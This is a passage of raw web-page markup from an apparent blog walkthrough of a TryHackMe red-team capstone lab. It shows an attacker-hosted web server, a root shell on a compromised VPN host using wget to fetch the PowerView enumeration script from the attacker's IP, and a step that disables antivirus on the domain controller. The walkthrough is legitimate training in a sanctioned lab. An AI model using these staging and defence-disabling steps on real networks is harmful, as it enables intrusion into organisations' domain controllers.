stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/RedTeam-Capstone]\n\u2514\u2500$ python3 -m http.server 80\nServing HTTP on 0.0.0.0 port 80 (http:\/\/0.0.0.0:80\/) ...\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">python3<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-m<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http.server<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">80<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Serving<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HTTP<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">on<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">0.0<\/span><span style=\"color: #C3E88D\">.0.0<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">port<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">80<\/span><span style=\"color: #BABED8\"> (http:\/\/0.0.0.0:80\/) ...<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>On VPN machine:<\/strong><\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"root@ip-10-200-113-12:\/var\/www\/html# cd \/tmp\nroot@ip-10-200-113-12:\/tmp# wget http:\/\/10.50.110.229\/PowerView.ps1\n--2024-02-07 15:15:26--  http:\/\/10.50.110.229\/PowerView.ps1\nConnecting to 10.50.110.229:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 770279 (752K) [application\/octet-stream]\nSaving to: \u2018PowerView.ps1\u2019\n\nPowerView.ps1       100%[===================&gt;] 752.23K   238KB\/s    in 3.2s    \n\n2024-02-07 15:15:30 (238 KB\/s) - \u2018PowerView.ps1\u2019 saved [770279\/770279]\n\nroot@ip-10-200-113-12:\/tmp# python3 -m http.server\nServing HTTP on 0.0.0.0 port 8000 (http:\/\/0.0.0.0:8000\/) ...\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">root@ip-10-200-113-12:\/var\/www\/html#<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cd<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/tmp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">root@ip-10-200-113-12:\/tmp#<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">wget<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/10.50.110.229\/PowerView.ps1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">--2024-02-07<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">15<\/span><span style=\"color: #C3E88D\">:15:26--<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">http:\/\/10.50.110.229\/PowerView.ps1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Connecting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.50<\/span><span style=\"color: #C3E88D\">.110.229:80...<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">connected.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">HTTP<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">request<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">sent,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">awaiting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">response...<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">200<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">OK<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Length:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">770279<\/span><span style=\"color: #BABED8\"> (752K) <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">application\/octet-stream<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Saving<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\u2018PowerView.ps1\u2019<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">PowerView.ps1<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #F78C6C\">100<\/span><span style=\"color: #C3E88D\">%[==================<\/span><span style=\"color: #BABED8\">=<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #C3E88D\">]<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">752.23<\/span><span style=\"color: #C3E88D\">K<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #F78C6C\">238<\/span><span style=\"color: #C3E88D\">KB\/s<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">in<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">3.2<\/span><span style=\"color: #C3E88D\">s<\/span><span style=\"color: #BABED8\">    <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">2024-02-07<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">15<\/span><span style=\"color: #C3E88D\">:15:30<\/span><span style=\"color: #BABED8\"> (238 <\/span><span style=\"color: #C3E88D\">KB\/s<\/span><span style=\"color: #BABED8\">) - \u2018PowerView.ps1\u2019 saved <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #F78C6C\">770279<\/span><span style=\"color: #BABED8\">\/770279<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">root@ip-10-200-113-12:\/tmp#<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">python3<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-m<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http.server<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Serving<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HTTP<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">on<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">0.0<\/span><span style=\"color: #C3E88D\">.0.0<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">port<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">8000<\/span><span style=\"color: #BABED8\"> (http:\/\/0.0.0.0:8000\/) ...<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>On CORPDC:<\/strong><\/p>\n\n\n\n<p>Before trying to get the file on CORPDC, we will need to turn OFF <code>Virus Protection<\/code>, and also allow our VPN server IP to download files in the browser settings.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911856f&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911856f\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"629\" data-attachment-id=\"509\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240208200201\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200201.png?fit=1466%2C900&amp;ssl=1\" data-orig-size=\"1466,900\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240208200201\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200201.png?fit=1024%2C629&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200201.png?resize=1024%2C629&#038;ssl=1\" alt=\"\" class=\"wp-image-509\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200201.png?resize=1024%2C629&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200201.png?resize=300%2C184&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200201.png?resize=768%2C471&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200201.png?w=1466&amp;ssl=1 1466w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09118ac0&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09118ac0\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"627\" data-attachment-id=\"510\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240208200355\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200355.png?fit=1335%2C817&amp;ssl=1\" data-orig-size=\"1335,817\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240208200355\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200355.png?fit=1024%2C627&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200355.png?resize=1024%2C627&#038;ssl=1\" alt=\"\" class=\"wp-image-510\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200355.png?resize=1024%2C627&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200355.png?resize=300%2C184&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200355.png?resize=768%2C470&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200355.png?w=1335&amp;ssl=1 1335w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911910a&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911910a\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"581\" data-attachment-id=\"511\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240208200550\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200550.png?fit=1344%2C763&amp;ssl=1\" data-orig-size=\"1344,763\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240208200550\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200550.png?fit=1024%2C581&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200550.png?resize=1024%2C581&#038;ssl=1\" alt=\"\" class=\"wp-image-511\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200550.png?resize=1024%2C581&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200550.png?resize=300%2C170&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200550.png?resize=768%2C436&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200550.png?w=1344&amp;ssl=1 1344w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911961d&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911961d\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"556\" data-attachment-id=\"512\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240207091754\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091754.png?fit=1410%2C766&amp;ssl=1\" data-orig-size=\"1410,766\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240207091754\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091754.png?fit=1024%2C556&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091754.png?resize=1024%2C556&#038;ssl=1\" alt=\"\" class=\"wp-image-512\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091754.png?resize=1024%2C556&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091754.png?resize=300%2C163&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091754.png?resize=768%2C417&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091754.png?w=1410&amp;ssl=1 1410w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can download the file now and start enumerating the domains.<\/p>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09119ae3&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09119ae3\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"388\" data-attachment-id=\"513\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240207091949\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091949.png?fit=1227%2C465&amp;ssl=1\" data-orig-size=\"1227,465\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240207091949\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091949.png?fit=1024%2C388&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091949.png?resize=1024%2C388&#038;ssl=1\" alt=\"\" class=\"wp-image-513\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091949.png?resize=1024%2C388&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091949.png?resize=300%2C114&amp;ssl=1 300w, 